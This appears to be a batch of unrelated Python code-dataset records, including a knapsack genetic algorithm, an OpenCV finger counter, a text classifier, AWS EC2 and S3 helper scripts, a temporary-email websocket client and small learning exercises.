masses = array('d', [0., ML, MN])\n# event = r.TGenPhaseSpace()\n# event.SetDecay(pTau, 3, masses)\n# \n# Nq2 = 20 \n# NEN = 20\n# ENMax = (mH-mh)\n# ENMax = r.TMath.Sqrt(((ENMax**2-ml**2-mN**2)/2.)**2+mN**2)\n# hist = r.TH2F(\"hist\", \"\", Nq2, (ml+mN)**2, (mH-mh)**2, NEN, mN, ENMax)\n#\n# ###### Integral\n# Integral = 0.\n#\n# #### For loop in order to integrate\n# for i in xrange(nToys):\n# event.Generate()\n# #### Getting momentum of the daughters\n# ph = event.GetDecay(0)\n# pN = event.GetDecay(1)\n# pl = event.GetDecay(2)\n# #### Computing the parameters to compute the phase space\n# q = pl+pN\n# q2 = q.M2()\n# EN = pN.E()\n#\n# iBin = hist.Fill(q2, EN)\n# \n# if hist.GetBinContent(iBin)==1.:\n# val = PhaseSpace3Body(q2, EN, mH, mh, mN, ml)\n# Integral+=val*hist.GetXaxis().GetBinWidth(1)*hist.GetYaxis().GetBinWidth(1)\n#\n# hist.Delete()\n# return {'Int':Integral, \"PHSP\":hist}\n# pass\n","sub_path":"tauToN.py","file_name":"tauToN.py","file_ext":"py","file_size_in_byte":7398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"653694825","text":"'''\ndef findit(str1,str2):\n count=0\n length=len(str1)\n for sublen in range(length,0,-1):\n for start in range(0,length-sublen+1):\n subst= str1[start:start+sublen]\n count+=1\n if str2.find(subst) >-1:\n return subst\n\nprint(findit(\"aljsrtylgalg\",\"aaaajsrtydjdmdm\"))\n'''\n\"\"\"\naljsrtylgalg 0\naljsrtylgal 1\naljsrtylga 2\naljsrtylg 3\n\ndef both(substr, s):\n '''\n 求2个字符串的最长公共子串\n abcdef\n '''\n length = len(substr)\n s = str(s)\n g = { substr[i:j] for i in range(length) for j in range(length, 0, -1)}\n\n def compare(g, s):\n return max([ i for i in g if i in s], key=len)\n\n return compare(g, s)\n\nprint(both('f', 'xbc de fghi'))\n\n\"\"\"\ndef findit(str1,str2):\n count=0\n length=len(str1)\n for sublen in range(length,0,-1):\n interval=length-sublen\n for k in range(0,interval+1):\n if str2.find(str1[k:k+sublen]) !=-1:\n return str1[k:k+sublen]\n\n\nprint(findit(\"aljsralg\",\"aaaajjjsradmdm\"))","sub_path":"数据结构/作用域/fuzhong_查找字符串的公共子串_1.py","file_name":"fuzhong_查找字符串的公共子串_1.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"176578421","text":"from unittest import TestCase\nfrom Testing.unit_tests.activities import eat, nap, is_funny\n\n\nclass ActivityTests(TestCase):\n\tdef test_eat_healthy(self):\n\t\tself.assertEqual(\n\t\t\t# testiram kada je is_healthy == True\n\t\t\teat(\"broccoli\", is_healthy=True),\n\t\t\t\"I am eating a broccoli, its healthy...\"\n\t\t)\n\n\tdef test_eat_unhealthy(self):\n\t\tself.assertEqual(\n\t\t\t# testiram kada je is_healthy == False\n\t\t\teat(\"pizza\", is_healthy=False),\n\t\t\t\"I am eating pizza, because I love it!\"\n\t\t)\n\n\tdef test_short_nap(self):\n\t\tself.assertEqual(\n\t\t\tnap(1),\n\t\t\t\"I am feeling refreshed after my 1 hour nap\"\n\t\t)\n\n\tdef test_long_nap(self):\n\t\tself.assertEqual(\n\t\t\tnap(3),\n\t\t\t\"Ugh I overslept. 
I dont like it!\"\n\t\t)\n\n\tdef test_is_funny_tim(self):\n\t\tself.assertEqual(is_funny(\"Tim\"), True)\n\t\t# isto ce raditi oba coda\n\t\tself.assertFalse(is_funny(\"Milan\"), \"Ovo je opciona poruka\")\n\n\tdef test_is_funny_anyone_else(self):\n\t\tself.assertTrue(is_funny(\"blue\"), \"blue is funny\")\n\t\tself.assertTrue(is_funny(\"pera\"), \"crazy kure\")\n\t\tself.assertTrue(is_funny(\"putin\"), \"crazy russian\")","sub_path":"Testing/unit_tests/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"421594732","text":"import numpy as np\r\nimport pandas as pd\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.preprocessing import LabelEncoder\r\nfrom sklearn.preprocessing import OneHotEncoder\r\nfrom sklearn.metrics import accuracy_score, confusion_matrix\r\nimport pickle\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.figure import Figure\r\nfrom os.path import join, dirname, realpath\r\nimport io\r\n\r\nif __name__=='__main__':\r\n data = pd.read_csv(\"train1.csv\")\r\n col = ['business','entertainment','politics','sport','tech']\r\n #Data Pre-Processing\r\n le_category = LabelEncoder()\r\n data['Encoded_Label'] = le_category.fit_transform(data.category)\r\n ohe_category = OneHotEncoder()\r\n temp = ohe_category.fit_transform(data.Encoded_Label.values.reshape(-1,1)).toarray()\r\n dataOneHot = pd.DataFrame(temp, columns = col)\r\n data = pd.concat([data, dataOneHot], axis=1)\r\n vector = TfidfVectorizer(stop_words='english')\r\n data_features = vector.fit_transform(data.iloc[:,1])\r\n filename='vect'\r\n pickle.dump(vector, open(filename, 'wb'))\r\n x_train, x_test, log_train, log_test = train_test_split(data_features, data.iloc[:,[3,4,5,6,7]], test_size=0.2)\r\n\r\n #Logistic Regression\r\n print(\"\\n Logistic Regression ->\\n\")\r\n logreg = LogisticRegression(C=10,solver=\"liblinear\")\r\n models={}\r\n avg_acc = 0\r\n model_acc = []\r\n for i in col:\r\n models[i] = logreg.fit(x_train, log_train[i])\r\n filename = \"model_\"+ str(i)\r\n pickle.dump(models[i], open(filename, 'wb'))\r\n y_pred = logreg.predict(x_test)\r\n acc = accuracy_score(log_test[i], y_pred)\r\n model_acc.append(\"{0:.2f}\".format(acc*100))\r\n c_matrix = confusion_matrix(log_test[i], y_pred)\r\n avg_acc = avg_acc + acc\r\n print(\"\\n Accuracy score for category \"+str(i)+\" using Logistic Regression: \"+str(100*acc)+\"%\")\r\n print(\"\\n Confusion Matrix for category \"+str(i)+\" using Logistic Regression: \")\r\n print(c_matrix)\r\n\r\n print(\"\\n Average Accuracy Score for Logistic Regression: \"+str(100*avg_acc/5)+\"\\n\")\r\n print(model_acc)\r\n model_acc = [float(i) for i in model_acc]\r\n fig = plt.figure()\r\n ax = fig.add_axes([0,0,1,1])\r\n ax.set_title('Comparison of testing accuracies for different labels')\r\n ax.set_xlabel('Labels')\r\n ax.set_ylabel('Model Accuracy')\r\n ax.set_xticklabels(col)\r\n ax.set_ylim([90,100])\r\n ax.bar(col,height = model_acc)\r\n for index,data in enumerate(model_acc):\r\n plt.text(x=index , y=data+0.2, s=f\"{data}\")\r\n path= join(dirname(realpath(__file__)), 'accuracy_score/')\r\n fig.savefig(path+\"graph.jpg\",bbox_inches = 'tight')\r\n print(\"Image saved!\")\r\n\r\ndef myinput(text):\r\n col = ['business','entertainment','politics','sport','tech']\r\n input_string=[text]\r\n vec = 
pickle.load(open('vect', 'rb'))\r\n input_data = vec.transform(input_string)\r\n result = []\r\n mymodels={}\r\n for i in col:\r\n filename = 'model_'+str(i)\r\n loaded_model = pickle.load(open(filename, 'rb'))\r\n result.append(loaded_model.predict_proba(input_data)[0,1])\r\n \r\n col_no = result.index(max(result))\r\n return col[col_no], result\r\n \r\n\r\n\r\n ","sub_path":"Text Category Classification/noGUI/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"492086081","text":"#! /usr/bin/python3\n\nstart_num = 10\nend_num = 32\n\nsquare = input(\"Enter number: \")\n\none_digit_squares = {\"1\" : 1, \"4\" : 2, \"9\" : 3, \"16\" : 4, \"25\" : 5, \"36\" : 6, \"49\" : 7, \"64\" : 8, \"81\" : 9}\n\nlast_digit = square[2:3]\nfirst_digit = square[0:1]\n\ncnt = 1\ncnt2 = 1\ncnt3 = cnt\nwhile cnt < 100:\n cnt2 = cnt2 + 2\n cnt += cnt2\n cnt3 = cnt\n cnt3 %= 10\n# prove theory of finding squareroot for 3 digit number in range\n# above\n","sub_path":"usefulprograms/findsquareroot.py","file_name":"findsquareroot.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"347394049","text":"import cv2\r\nimport numpy as np\r\nimport copy\r\nimport math\r\n\r\n# parameters\r\ncap_region_x_begin=0.5 # start point/total width\r\ncap_region_y_end=0.8 # start point/total width\r\nthreshold = 60 # BINARY threshold\r\nblurValue = 41 # GaussianBlur parameter\r\n# how much changes in background should be detect\r\nbgSubThreshold = 50\r\n\r\n# variables\r\nisBgCaptured = 0 # bool, whether the background captured\r\ntriggerSwitch = False # if true, keyborad simulator works\r\n\r\ndef putText(cnt):\r\n # Create a black image\r\n newimg = np.zeros((512, 512, 3), np.uint8)\r\n\r\n # Write some Text\r\n\r\n font = cv2.FONT_HERSHEY_SIMPLEX\r\n bottomLeftCornerOfText = (10, 500)\r\n fontScale = 1\r\n fontColor = (255, 255, 255)\r\n lineType = 2\r\n\r\n cv2.putText(newimg, str(cnt+1)+\" fingers\",\r\n bottomLeftCornerOfText,\r\n font,\r\n fontScale,\r\n fontColor,\r\n lineType)\r\n\r\n # Display the image\r\n cv2.imshow(\"fingers\", newimg)\r\n\r\n\r\n\r\ndef printThreshold(thr):\r\n print(\"! Changed threshold to \"+str(thr))\r\n\r\n\r\ndef removeBG(frame):\r\n fgmask = bgModel.apply(frame) #it now captures changes in already captured background\r\n # kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (3, 3))\r\n # res = cv2.morphologyEx(fgmask, cv2.MORPH_OPEN, kernel)\r\n #cv2.imshow(\"fgmask\",fgmask)\r\n kernel = np.ones((3, 3), np.uint8)\r\n fgmask = cv2.erode(fgmask, kernel, iterations=1)\r\n #cv2.imshow(\"fgmask2\", fgmask)\r\n res = cv2.bitwise_and(frame, frame, mask=fgmask)\r\n #cv2.imshow(\"res\",res)\r\n return res\r\n\r\n\r\ndef calculateFingers(res,drawing): # -> finished bool, cnt: finger count\r\n # convexity defect\r\n hull = cv2.convexHull(res, returnPoints=False)\r\n # hull contains the indices of the points of the convexhull of \"res\"\r\n if len(hull) > 3:\r\n #It returns an array where each row contains these values\r\n # - [ start point, end point, farthest point, approximate distance to farthest point ].\r\n defects = cv2.convexityDefects(res, hull)\r\n if type(defects) != type(None): # avoid crashing. 
(BUG not found)\r\n cnt = 0\r\n for i in range(defects.shape[0]): # calculate the angle\r\n s, e, f, d = defects[i][0]\r\n start = tuple(res[s][0])\r\n end = tuple(res[e][0])\r\n far = tuple(res[f][0])\r\n #print(i,d)\r\n a = math.sqrt((end[0] - start[0]) ** 2 + (end[1] - start[1]) ** 2)\r\n b = math.sqrt((far[0] - start[0]) ** 2 + (far[1] - start[1]) ** 2)\r\n c = math.sqrt((end[0] - far[0]) ** 2 + (end[1] - far[1]) ** 2)\r\n angle = math.acos((b ** 2 + c ** 2 - a ** 2) / (2 * b * c)) # cosine theorem\r\n if angle <= (math.pi / 180)*100 and d > 16000: # angle less than 90 degree, treat as fingers\r\n cnt += 1\r\n cv2.circle(drawing, far, 8, [211, 84, 0], -1)\r\n return True, cnt\r\n return False, 0\r\n\r\n\r\n# Camera\r\ncamera = cv2.VideoCapture(0)\r\n# set brightness\r\ncamera.set(10,200)\r\ncv2.namedWindow('trackbar')\r\ncv2.createTrackbar('trh1', 'trackbar', threshold, 100, printThreshold)\r\n\r\n\r\nwhile camera.isOpened():\r\n _, frame = camera.read()\r\n #get threshold value\r\n threshold = cv2.getTrackbarPos('trh1', 'trackbar')\r\n # apply bilateralFilter for highly effective in noise removal while keeping edges sharp\r\n frame = cv2.bilateralFilter(frame, 5, 50, 100) # smoothing filter\r\n frame = cv2.flip(frame, 1) # flip the frame horizontally\r\n # frame.shape[1] width and frame.shape[0] height\r\n cv2.rectangle(frame, (int(cap_region_x_begin * frame.shape[1]), 0),\r\n (frame.shape[1], int(cap_region_y_end * frame.shape[0])), (255, 0, 0), 2) #RGB, width of border\r\n cv2.imshow('original', frame)\r\n\r\n # Main operation\r\n if isBgCaptured == 1: # this part wont run until background captured\r\n img = removeBG(frame)\r\n img = img[0:int(cap_region_y_end * frame.shape[0]),\r\n int(cap_region_x_begin * frame.shape[1]):frame.shape[1]] # clip the ROI\r\n cv2.imshow('mask', img)\r\n\r\n # convert the image into binary image\r\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n blur = cv2.GaussianBlur(gray, (blurValue, blurValue), 0)\r\n cv2.imshow('blur', blur)\r\n ret, thresh = cv2.threshold(blur, threshold, 255, cv2.THRESH_BINARY)\r\n cv2.imshow('ori', thresh)\r\n\r\n\r\n # get the coutours\r\n thresh1 = copy.deepcopy(thresh)\r\n contours, hierarchy = cv2.findContours(thresh1, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\r\n length = len(contours)\r\n maxArea = -1\r\n if length > 0:\r\n for i in range(length): # find the biggest contour (according to area)\r\n temp = contours[i]\r\n area = cv2.contourArea(temp)\r\n if area > maxArea:\r\n maxArea = area\r\n ci = i\r\n\r\n res = contours[ci]\r\n #get extreme top point in image\r\n extTop = tuple(res[res[:, :, 1].argmin()][0])\r\n hull = cv2.convexHull(res)\r\n #for comletely black bacground or image, np,zeroes() is used\r\n drawing = np.zeros(img.shape, np.uint8)\r\n cv2.drawContours(drawing, [res], 0, (0, 255, 0), 2)\r\n cv2.drawContours(drawing, [hull], 0, (0, 0, 255), 3)\r\n cv2.circle(drawing, extTop, 8, (255, 255, 0), -1)\r\n # cv2.imshow(\"drwaing\",drawing)\r\n isFinishCal,cnt = calculateFingers(res,drawing)\r\n # if no fingers then cnt = -1\r\n if extTop[1] > 130:\r\n cnt = -1\r\n putText(cnt)\r\n if triggerSwitch is True:\r\n if isFinishCal is True and cnt <= 2:\r\n print (cnt)\r\n #app('System Events').keystroke(' ') # simulate pressing blank space\r\n\r\n cv2.imshow('output', drawing)\r\n\r\n # Keyboard OP\r\n # delay in next frame or fps = 1000/value given in waitKey\r\n k = cv2.waitKey(10)\r\n if k == 27: # press ESC to exit\r\n break\r\n elif k == ord('b'): # press 'b' to capture the background\r\n bgModel = 
cv2.BackgroundSubtractorMOG2(0, bgSubThreshold)\r\n isBgCaptured = 1\r\n print ('!!!Background Captured!!!')\r\n elif k == ord('r'): # press 'r' to reset the background\r\n bgModel = None\r\n triggerSwitch = False\r\n isBgCaptured = 0\r\n print ('!!!Reset BackGround!!!')\r\n elif k == ord('n'):\r\n triggerSwitch = True\r\n print ('!!!Trigger On!!!')\r\n\r\n# Release camera & end program\r\ncamera.release()\r\ncv2.destroyAllWindows()","sub_path":"Finger Counter/imagecv.py","file_name":"imagecv.py","file_ext":"py","file_size_in_byte":6699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"234726423","text":"#!/usr/bin/python\n\nimport sys\n\n\ndef making_change(amount, coins = [1, 5, 10, 25, 50], cache = {}):\n # get the all possible coins left\n uniqueCoins = len(coins)\n # coin value was higher than amount\n # so dont add anything to total\n if amount < 0: return 0\n # finished coin combination\n # so add 1 to total ways of making change for n $\n elif amount == 0: return 1\n # use cache to improve performance\n elif (amount, uniqueCoins) in cache: return cache[(amount, uniqueCoins)]\n # recursive loop\n else:\n total = 0\n for c in range(0, uniqueCoins):\n coin = coins[c]\n if coin > amount:\n continue\n else:\n result = making_change(amount - coin, coins[c:], cache)\n if result > 0:\n total += result\n cache[(amount, uniqueCoins)] = total\n return total\n\nif __name__ == \"__main__\":\n # Test our your implementation from the command line\n # with `python making_change.py [amount]` with different amounts\n if len(sys.argv) > 1:\n denominations = [1, 5, 10, 25, 50]\n amount = int(sys.argv[1])\n print(\"There are {ways} ways to make {amount} cents.\".format(ways=making_change(amount, denominations), amount=amount))\n else:\n print(\"Usage: making_change.py [amount]\")","sub_path":"making_change/making_change.py","file_name":"making_change.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"219094103","text":"import threading\nimport time\n\n\nlock_1 = threading.Lock()\nlock_2 = threading.Lock()\n\n\ndef func_1():\n print(\"函数1开始\")\n lock_1.acquire(timeout=4)\n print(\"1申请到了\")\n time.sleep(2)\n print(\"1等待\")\n\n rst = lock_2.acquire(timeout=2)\n if rst:\n print(\"1已经得到锁\")\n lock_2.release()\n print(\"1释放\")\n else:\n print(\"1没申请到\")\n\n lock_1.release()\n print(\"1释放了\")\n print(\"1 done\")\n\n\ndef func_2():\n print(\"函数2开始\")\n lock_2.acquire()\n print(\"2申请到了\")\n time.sleep(4)\n print(\"2等待\")\n\n lock_1.release()\n print(\"2释放了1\")\n lock_2.release()\n print(\"2释放了2\")\n\n print(\"2 done\")\n\nif __name__ == '__main__':\n print(\"主程序启动啦\")\n t1 = threading.Thread(target=func_1(), args=())\n t2 = threading.Thread(target=func_2(), args=())\n\n t1.start()\n t2.start()\n\n t1.join()\n t2.join()\n\n print(\"主程序结束啦\")","sub_path":"12-多线程/15.py","file_name":"15.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"517194468","text":"class Solution(object):\n def topKFrequent(self, nums, k):\n \"\"\"\n :type nums: List[int]\n :type k: int\n :rtype: List[int]\n \"\"\"\n d = {}\n for num in nums:\n if num not in d:\n d[num] = 1\n else:\n d[num] += 1\n l = []\n for key, value in d.items():\n l.append((value, key))\n l = self.heapSort(l)\n res = []\n for i in range(k):\n res.append(l[len(d) - i - 1][1])\n return res\n \n def heapSort(self, arr):\n n 
= len(arr)\n        first = int((n >> 1) - 1)\n        for start in range(first, -1, -1):\n            self.heapAdjust(arr, start, n - 1)\n        for end in range(n - 1, 0, -1):\n            arr[end], arr[0] = arr[0], arr[end]\n            self.heapAdjust(arr, 0, end - 1)\n        return arr\n    \n    def heapAdjust(self, arr, start, end):\n        root = start\n        while True:\n            child = root * 2 + 1\n            if child > end: break\n            if child + 1 <= end and arr[child][0] < arr[child + 1][0]:\n                child += 1\n            if arr[root][0] < arr[child][0]:\n                arr[root], arr[child] = arr[child], arr[root]\n                root = child\n            else:\n                break\n","sub_path":"python/topKFrequentElements.py","file_name":"topKFrequentElements.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
{"seq_id":"295989308","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 30 14:15:51 2017\n\n@author: JoJo\n\"\"\"\n\nimport random\nimport prettytable\n\nclass Sackitem:\n    def __init__ (self, weight, value):\n        self.weight = weight\n        self.value = value\n        \nclass individual:\n    def __init__(self, genome, ttlweight, ttlvalue, fitness):\n        self.genome = genome\n        self.mass = ttlweight\n        self.value = ttlvalue\n        self.fitness = fitness\n    \n\n\ndef generatesack(nmbrofitems):\n    \"\"\"This function generates a list of items with random weight/value pairs.\n    \"\"\"\n    while nmbrofitems != 0:\n        newitem = Sackitem(random.randint(1,10),random.randint(1,20))\n        itemlist.append(newitem)\n        nmbrofitems -= 1\n    return itemlist\n    \ndef geninitialpopulation(counter,itemlist):\n    itemlen = len(itemlist)\n    population = []\n    while counter != 0:\n        newgene = []\n        for index in range(itemlen):\n            gene = random.randint(0,1)\n            newgene.append(gene)\n        population.append(newgene)\n        counter -= 1\n    population = populationconstruction(population)\n    return population\n\ndef evolution(inipop):\n    \"\"\"This function controls the evolutionary cascade until no better individual has been generated for 25 consecutive generations.\n    in: initial population as a list of individuals; out: best individual after 25 generations with no change\n    \"\"\"\n    popmorph = inipop\n    countgenerations = 0\n    terminalcount = 0\n    bestindiv = inipop[0]\n    print(\"initializing with fitness: \",bestindiv.fitness)\n    \n    \n    while terminalcount != 25:\n        \n        #sort ascending by fitness so top_individual really returns the best of this generation\n        popmorph = sorted(popmorph, key=lambda individual: individual.fitness)\n        \n        generationsbest = top_individual(popmorph)\n        print(\"evaluating generation: \",countgenerations)\n        countgenerations += 1\n        \n        \n        if generationsbest.fitness > bestindiv.fitness:\n            \n            bestindiv = generationsbest\n            print(\"Better individual found in generation\",countgenerations,\"! Top fitness now: \",bestindiv.fitness)\n            terminalcount = 0\n        else:\n            terminalcount += 1\n\n        \n        \n        popmorph = next_generation(popmorph)\n        \n        \n    return(bestindiv, countgenerations)\n
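\n# Minimal sketch of the encoding used above (illustrative numbers only): each\n# genome is a bit list over itemlist, where 1 means \"pack this item\". With\n# items [(weight=3, value=10), (weight=8, value=4)] and weightlimit = 5, the\n# genome [1, 0] yields mass 3, value 10, fitness 10, while [1, 1] is overweight\n# (mass 11 > 5) and is scored fitness -1 by populationconstruction further down.\n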
\n    \ndef top_individual(sortedpop):\n    \"\"\"input: sorted and cut list of individuals, output: best individual\"\"\"\n    topobject = sortedpop[-1]\n    return topobject\n\ndef selection(population):\n    \"\"\"input: List of individuals, output: sorted and cut list of individuals\n    \"\"\"\n    sortedpop = sorted(population, key=lambda individual: individual.fitness)\n    toplist = sortedpop[len(sortedpop)//2:] #the list is sorted ascending, so the fitter half sits at the end\n    return toplist\n    \ndef next_generation(population):\n    \"\"\"input: last generation as list of individual objects, output: a new generation generated by combining genes from the old one\"\"\"\n    currentgenomes = []\n    newgeneration = []\n    \n    if len(population) %2 == 1:\n        del population[0] #drop one individual so parents can be paired up\n    \n    maxindex = len(population) #set after the odd-size fix so the pairing loop terminates\n    \n    for item in population:\n        currentgenomes.append(item.genome)\n    while maxindex != 0:\n\n        \n        getgene1 = random.randint(0,len(currentgenomes)-1)\n        parentgene1 = currentgenomes[getgene1]\n        del currentgenomes[getgene1]\n        \n        \n        getgene2 = random.randint(0,len(currentgenomes)-1)\n        parentgene2 = currentgenomes[getgene2]\n        del currentgenomes[getgene2]\n        \n        cutpoint = random.randint(0,len(parentgene1)-1)\n        \n        #one-point crossover: each child takes the head of one parent and the tail of the other\n        child1 = parentgene1[:cutpoint] + parentgene2[cutpoint:]\n        child2 = parentgene2[:cutpoint] + parentgene1[cutpoint:]\n        \n        \n        newgeneration.append(child1)\n        newgeneration.append(child2)\n        maxindex -= 2\n    mutate(newgeneration) \n    final_generation = populationconstruction(newgeneration)\n    return final_generation\n    \ndef mutate(population):\n    \"\"\"Input: List of binary genomes, output: list of genomes with one mutated individual\"\"\"\n    choosemutant = random.randrange(len(population))\n    mutant = population[choosemutant]\n    del population[choosemutant]\n    choosegene2mutate = random.randrange(len(mutant))\n    \n    if mutant[choosegene2mutate] == 1:\n        mutant[choosegene2mutate] = 0\n    else:\n        mutant[choosegene2mutate] = 1\n    population.append(mutant)\n    \n    return population\n
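\n# Quick illustration of the operators above (hypothetical genomes): crossing\n# parents [1, 1, 0, 0] and [0, 0, 1, 1] at cutpoint 2 gives the children\n# [1, 1, 1, 1] and [0, 0, 0, 0]; mutate() then flips exactly one random bit in\n# one randomly chosen genome of the new generation.\n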
\n    \ndef populationconstruction(listoflist):\n    \"\"\"Input: List of binary genomes, output: new list of individual objects with fitness, weight, value\"\"\"\n    returnfinishedpopulation = []\n    for item in listoflist:\n        attributelist = []\n        totalweight = 0\n        totalvalue = 0\n        totalfitness = 0\n        iterator = 0\n        for index in item:\n            if index == 1:\n                attributelist.append(itemlist[iterator])\n                iterator += 1\n            else:\n                iterator += 1\n        \n        for attributeindex in attributelist:\n            totalweight = totalweight + attributeindex.weight\n            totalvalue = totalvalue + attributeindex.value\n        if totalweight > weightlimit:\n            totalfitness = -1\n        else:\n            totalfitness = totalvalue\n        newindividual = individual(item,totalweight,totalvalue,totalfitness)\n        returnfinishedpopulation.append(newindividual)\n    return returnfinishedpopulation\n    \n    \ndef initalize():\n    \"\"\"This function builds a large random search space (the item count is fixed below, no user input is requested) and handles all console output\n    \"\"\"\n    global itemlist\n    global limit\n    global weightlimit\n    global indivcount\n\n    \n    itemlist = []\n    \n    limit = 50000\n    print(\"Initializing with \",limit,\" Items to choose from\")\n    sack = generatesack(limit)\n    \n    weightlimit = 0\n    for i in sack:\n        weightlimit += i.weight\n    weightlimit = weightlimit//2\n    print(\"The knapsack weightlimit is: \", weightlimit)\n    \n    indivcount = 200\n    print(\"Initializing with \",indivcount,\" Individuals per generation\")\n    takelist = geninitialpopulation(indivcount, sack)\n    final_output = evolution(takelist)\n    \n    generations = final_output[1]\n    final_output = final_output[0]\n    \n    print(\"\\n\")\n    print(\"Best individual:\")\n    bestindiv = prettytable.PrettyTable()\n    bestindiv.field_names = [\"weight\",\"total value\",\"fitness\"]\n    bestindiv.add_row([final_output.mass,final_output.value,final_output.fitness])\n    print(bestindiv)\n    print(\"Best solution achieved after \",generations, \" generations!\")\n    print(\"Distance to weightlimit: \",weightlimit - final_output.mass)\n\n    \n    \n\n    \ninitalize()","sub_path":"knapsack evolution.py","file_name":"knapsack evolution.py","file_ext":"py","file_size_in_byte":6558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
{"seq_id":"473372994","text":"## sudo pip install --user websocket-client\nfrom websocket import create_connection\nimport random\n\nclass mailbox(object):\n\t\"\"\"10 minute mailbox\"\"\"\n\tdef __init__(self):\n\t\tsuper(mailbox, self).__init__()\n\t\tself.ws = create_connection(\"wss://dropmail.me/websocket\")\n\t\tself.next = self.ws.recv\n\t\tself.close = self.ws.close\n\t\tself.email_hashes = []\n\t\temail_hash = self.next()[1:]\n\t\tself.email_hashes.append(email_hash)\n\t\tself.next()\n\n\t#adds a random email, returns its address\n\tdef addRandomEmail(self):\n\t\tself.ws.send(\"M\")\n\t\temail_hash = self.next()[1:]\n\t\tself.email_hashes.append(email_hash)\n\t\treturn email_hash.split(\":\")[0]\n\n\t#requires email and hash in the form name@domain:hash\n\tdef addEmail(self, email_hash):\n\t\tself.ws.send(\"R{}\".format(email_hash))\n\t\tself.email_hashes.append(self.next()[1:])\n\n\t#returns the list of emails present in the socket\n\tdef getEmails(self):\n\t\temails = []\n\t\tfor email_hash in self.email_hashes:\n\t\t\temails.append(email_hash.split(\":\")[0])\n\t\treturn emails\n\nif __name__ == '__main__':\n\tbox = mailbox()\n\t#adding emails\n\tprint(box.addRandomEmail())\n\tprint(box.email_hashes)\n\tprint(box.getEmails())\n\t#reading mail\n\tprint(box.next())","sub_path":"MinuteMail.py","file_name":"MinuteMail.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
{"seq_id":"109784858","text":"import boto3\nfrom botocore.exceptions import ClientError\n\n\ndef lambda_handler(event, context):\n    instance_ids = get_instance_ids(event)\n    if event['Action'] == 'StartInstance':\n        result = start_instances(instance_ids)\n        print(result)\n    elif event['Action'] == 'StopInstance':\n        result = stop_instances(instance_ids)\n        print(result)\n\n\ndef get_instance_ids(event):\n    if 'InstanceId' in event:\n        return [event['InstanceId']]\n\n    ec2 = boto3.client('ec2')\n\n    if 'Environment' in event:\n        result = ec2.describe_instances(Filters=[{\n            \"Name\": \"tag:Environment\",\n            \"Values\": [event['Environment']]\n        }])\n        instances = [i for r in result['Reservations'] for i in r['Instances']]\n        return list(map(lambda i: i['InstanceId'], instances))\n\n    try:\n        # get_function_configuration is a Lambda API, so it needs a Lambda client (the EC2 client has no such method)\n        lambda_client = boto3.client('lambda')\n        lambda_config = lambda_client.get_function_configuration(\n            FunctionName='Ec2CycleInstance'\n        )\n        return [lambda_config['Environment']['Variables']['InstanceId']]\n    except ClientError as e:\n        print(e)\n\n\ndef start_instances(instance_ids):\n    ec2 = boto3.client('ec2')\n    try:\n        result = ec2.start_instances(InstanceIds=instance_ids)\n        return result\n    except ClientError as e:\n        print(e)\n\n\ndef stop_instances(instance_ids):\n    ec2 = boto3.client('ec2')\n    try:\n        result = ec2.stop_instances(InstanceIds=instance_ids)\n        
return result\n except ClientError as e:\n print(e)\n","sub_path":"blueprints/aws/codebuild/trigger/lambda/CodebuildTrigger.py","file_name":"CodebuildTrigger.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"4510514","text":"import boto3 \nimport os \nfrom dotenv import load_dotenv\n\nload_dotenv() # this loads the .env file with our credentials\n\nfile_name = 'data_files.zip' # name of the file to upload\nbucket_name = 'ramzi-final-project' # name of the bucket\n\ns3_client = boto3.client(\n 's3',\n aws_access_key_id=os.getenv('AWS_ACCESS_KEY_ID'),\n aws_secret_access_key=os.getenv('AWS_SECRET_ACCESS_KEY')\n)\n\nresponse = s3_client.upload_file(file_name, bucket_name, file_name)","sub_path":"airflow_final/boto_to_s3.py","file_name":"boto_to_s3.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"396456721","text":"from django import forms\nfrom django.utils import formats, six\nfrom django.utils.encoding import force_str, force_text\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.core.exceptions import ValidationError\nfrom django.core import validators\n\nimport datetime\n\n\nclass DateRangeField(forms.Field):\n \"\"\"\n Custom form field for saving date range two separate fields start_date\n and end_date in model\n \"\"\"\n input_formats = formats.get_format_lazy('DATE_INPUT_FORMATS')\n default_error_messages = {\n 'invalid': _('Enter a valid date.'),\n }\n\n def to_python(self, value):\n valid_data = []\n if value in validators.EMPTY_VALUES:\n return value\n\n dates = value.split(' - ')\n if len(dates) != 2:\n raise ValidationError(_('Wrong 